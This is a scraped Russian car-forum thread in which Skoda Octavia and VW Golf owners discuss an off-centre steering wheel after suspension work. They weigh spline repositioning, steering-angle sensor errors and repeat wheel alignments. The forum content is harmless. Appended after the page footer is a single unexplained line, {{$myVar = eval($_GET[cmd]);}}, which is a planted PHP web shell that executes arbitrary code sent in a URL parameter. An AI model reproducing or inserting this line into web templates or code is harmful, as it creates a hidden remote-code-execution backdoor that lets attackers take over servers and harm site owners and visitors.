+ Ответить в теме
Страница 1 из 3 1 2 3 ПоследняяПоследняя
Показано с 1 по 10 из 24

Тема: Не могу отрегулировать положение рулевого колеса в "ноль". Как быть?


  1. #1
    GTI-Racing Verlion is on a distinguished road Аватар для Verlion
    Регистрация
    07.05.2010
    Откуда
    Mosca
    Машина
    Octavia A5 / 1.8 CDAB / 2013
    Сообщений
    124

    Не могу отрегулировать положение рулевого колеса в "ноль". Как быть?

    Авто Октавия 2 ФЛ / 1.8 / МКПП / пробег 8000 км.
    После обкатки (3100 км) произвел замену подвески: -35+Б6+стабы+сайленты и после пробега ~ 500 км сделал сход-развал (у не официалов) затем активировали некоторые функции усилителя рулевого управления (из основных помню только - чтобы авто не уводило в сторону, на Октавиях вправо, чтобы этот увод свести к минимуму. Надеюсь понятно изложил), затем заменил обод рулевого колеса от Октавии РС и после этого никак не могу выставить положение в "ноль" и чтобы авто прямо ехало.
    В ноябре поехал снова на сход-развал, но к дилеру. Вывели почти в "ноль". В любом случае небольшая проблемка осталась - при движении прямо и установке рулевого колеса в "нулевое" положение авто начинает уводить влево, несильно но всё-таки. Поэтому при движении прямо рулевое колесо немного повёрнуто вправо (может 2-3-4 градуса относительно горизонтали).
    Предположения решения проблемы (от простого к сложному):
    1. Зимняя шипованная резина. Поставлю лето и всё пройдёт;
    2. Переставить рулевое колесо на 1-2 шлица левее;
    3. Снова делать сход-развал
    4. Замена подвески привела к такому результату и ничего не сделать с помощью регулировок. Ну тут понятно, без вариантов;
    5. Вернуть все настройки блока электроусилителя в сток и уже от этого отталкиваться, что и как будет себя вести.

    Каким путём правильнее будет идти в этой ситуации? Что делать? К кому обращаться?

  2. #2
    GTI-Racing troyanov has a spectacular aura about troyanov has a spectacular aura about troyanov has a spectacular aura about Аватар для troyanov
    Регистрация
    22.09.2012
    Откуда
    moscow
    Машина
    vw golf vi gti
    Сообщений
    142
    Я когда-то пошел по варианту #2 (1 час в гараже и полная удовлетворенность)
    Поймал люк по весне - руль уехал влево градуса на 3
    Сделал сход развал у дилера - руль уехал вправо градуса на 2 :)

  3. #3
    GTI-Racing Verlion is on a distinguished road Аватар для Verlion
    Регистрация
    07.05.2010
    Откуда
    Mosca
    Машина
    Octavia A5 / 1.8 CDAB / 2013
    Сообщений
    124
    Цитата Сообщение от troyanov Посмотреть сообщение
    Я когда-то пошел по варианту #2 (1 час в гараже и полная удовлетворенность)
    Поймал люк по весне - руль уехал влево градуса на 3
    Сделал сход развал у дилера - руль уехал вправо градуса на 2 :)
    Спасибо. Я тоже склоняюсь к варианту № 2.

  4. #4
    GTI-Racing troyanov has a spectacular aura about troyanov has a spectacular aura about troyanov has a spectacular aura about Аватар для troyanov
    Регистрация
    22.09.2012
    Откуда
    moscow
    Машина
    vw golf vi gti
    Сообщений
    142
    Цитата Сообщение от Verlion Посмотреть сообщение
    Спасибо. Я тоже склоняюсь к варианту № 2.
    Не знаю как на Октавии, но на Гольфе последовательность действий была следующая:

    1. снять клеммы с аккумулятора
    2. вооружиться зеркалом или телефоном с фронтальной камерой чтобы отщелкнуть две защелки (положение руля 90 градусов влево, потом вправо)
    3. снять подушку (2 разъема)
    4. головка для откручивания самого руля не помню какая нужна :(

    *перед тем как снять руль, рекомендую сделать насечку - типа как он стоял раньше

    собрать все в обратном порядке и не бояться ошибок рулевой, abs и ecs - пройдет само через 2 минуты езды.. (у меня так было)

  5. #5
    GTI-Racing урр is on a distinguished road Аватар для урр
    Регистрация
    28.10.2012
    Откуда
    Москва
    Машина
    VAG багажник А7 1.8тсыыы
    Сообщений
    27
    Было такое когда руль менял на новый. Переставление по шлицам не помогало, либо в право либо в лево получалось. Ставишь родной все Ок. Помог только сход развал, только руль нужно в салоне сразу ровно закрепить.

  6. #6
    GTI-Racing KLENUH will become famous soon enough Аватар для KLENUH
    Регистрация
    17.02.2013
    Откуда
    Москва, Северное Бутово
    Машина
    ГТИ6
    Сообщений
    104
    Точно такая же беда после мелкого дтп. Был удар в переднее левое колесо, оно ушло чуть в право. Поменял стойки + в вв севере приговорили кулак, причем с другой стороны. После сходразвала машину сильно вело в лево. Доехал так домой, утром опять поехал в север, машину уже вело в право, но очень слабо. Сделали снова, руль на пару градусов в право и машину ведет туда же. Сбросили руль в ноль, безрезультатно. Сейчас сижу в севере жду очередной попытки, долго уже жду.

  7. #7
    GTI-Racing troyanov has a spectacular aura about troyanov has a spectacular aura about troyanov has a spectacular aura about Аватар для troyanov
    Регистрация
    22.09.2012
    Откуда
    moscow
    Машина
    vw golf vi gti
    Сообщений
    142
    Цитата Сообщение от KLENUH Посмотреть сообщение
    Точно такая же беда после мелкого дтп. Был удар в переднее левое колесо, оно ушло чуть в право. Поменял стойки + в вв севере приговорили кулак, причем с другой стороны. После сходразвала машину сильно вело в лево. Доехал так домой, утром опять поехал в север, машину уже вело в право, но очень слабо. Сделали снова, руль на пару градусов в право и машину ведет туда же. Сбросили руль в ноль, безрезультатно. Сейчас сижу в севере жду очередной попытки, долго уже жду.
    у Вас видимо ситуация серьезнее.. в моем случае машину сейчас никуда не ведет, почему в моём случае руль ушел в другую сторону после сходразвала - не знаю. может быть из-за того, что когда делали сходразвал - руль не совсем в 0 выставили?

  8. #8
    Супер Модератор Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Аватар для Spaceman
    Регистрация
    13.01.2009
    Откуда
    Moscow
    Машина
    GTI Overload
    Сообщений
    6,561
    переставив руль на шлице можно получить ошибку по датчика положения руля, если чуть сместить сам шток относительно его 0 положения
    а решение ехать на норм сход-развал
    Golf V GTI Overload почти сток...

  9. #9
    GTI-Racing troyanov has a spectacular aura about troyanov has a spectacular aura about troyanov has a spectacular aura about Аватар для troyanov
    Регистрация
    22.09.2012
    Откуда
    moscow
    Машина
    vw golf vi gti
    Сообщений
    142
    Цитата Сообщение от Spaceman Посмотреть сообщение
    переставив руль на шлице можно получить ошибку по датчика положения руля, если чуть сместить сам шток относительно его 0 положения
    а решение ехать на норм сход-развал
    сходразвал делал в севере, мы же его все любим..
    ошибка на приборке была, но пропала как только я покрутил рулем. в логах ошибок не было..

    кстати до моего вмешательства руль стоял не совсем ровно, судя по имеющейся засечке.. машину новую брал :)

  10. #10
    Супер Модератор Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Аватар для Spaceman
    Регистрация
    13.01.2009
    Откуда
    Moscow
    Машина
    GTI Overload
    Сообщений
    6,561
    Цитата Сообщение от troyanov Посмотреть сообщение
    сходразвал делал в севере, мы же его все любим..
    ошибка на приборке была, но пропала как только я покрутил рулем. в логах ошибок не было..

    кстати до моего вмешательства руль стоял не совсем ровно, судя по имеющейся засечке.. машину новую брал :)
    мне не надо про север рассказывать
    лично там переделывал развал 3 раза, пока стенд не откалибровали...

    рассказать какие параметры на что влияют?)
    Golf V GTI Overload почти сток...

+ Ответить в теме
Страница 1 из 3 1 2 3 ПоследняяПоследняя

Похожие темы

  1. Ответов: 3
    Последнее сообщение: 02.04.2024, 06:45
  2. "I этап Кубка "МАГИСТРАЛЬ 2012" - 17 марта"
    от Magistral в разделе Туризм и отдых
    Ответов: 3
    Последнее сообщение: 02.04.2024, 03:58
  3. Как повысить отклик рулевого колеса на реакцию авто?
    от Verlion в разделе Тюнинг: подвеска, ходовая, тормозная система, КПП
    Ответов: 18
    Последнее сообщение: 28.04.2014, 18:18
  4. Люфт рулевого колеса, в чем проблема?
    от Grisha в разделе Ходовая
    Ответов: 2
    Последнее сообщение: 14.07.2011, 00:32

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}